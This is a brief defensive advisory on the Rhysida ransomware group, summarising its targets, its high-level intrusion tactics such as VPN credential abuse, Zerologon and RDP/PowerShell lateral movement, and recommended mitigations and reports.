Rhysida, a ransomware variant first identified in May 2023, has increasingly targeted industries such as healthcare, education, manufacturing, information technology, and government. It is believed that the group operates on a RaaS model, where affiliates lease the ransomware tools and infrastructure in exchange for a share of the profits.
Recently, Rhysida has attacked the healthcare sector, exposing sensitive data of hundreds of thousands of individuals. These attacks typically involve stealing personal and health information, which is then sold on Rhysida’s dark web leak site.
The group exploits vulnerabilities in remote services, such as VPNs, often gaining access through compromised credentials. They have also utilized the Zerologon vulnerability (CVE-2020-1472), a critical flaw in Microsoft systems, and phishing campaigns to infiltrate networks. Once inside, they employ living-off-the-land techniques, using tools like Remote Desktop Protocol (RDP) connections and PowerShell scripts to move laterally through victim systems and evade detection. These tactics blend with normal network activity, making it difficult to identify the attack.
To reduce the risk of attacks like those from Rhysida, organizations are encouraged to implement the Healthcare and Public Health Cybersecurity Performance Goals (CPGs). These measures can help mitigate cyber threats and vulnerabilities, lessening the potential impact of security breaches. For more information about Rhysida and indicators of compromise, refer to the TrendMicro Report and CISA’s #StopRansomware: Rhysida Ransomware report.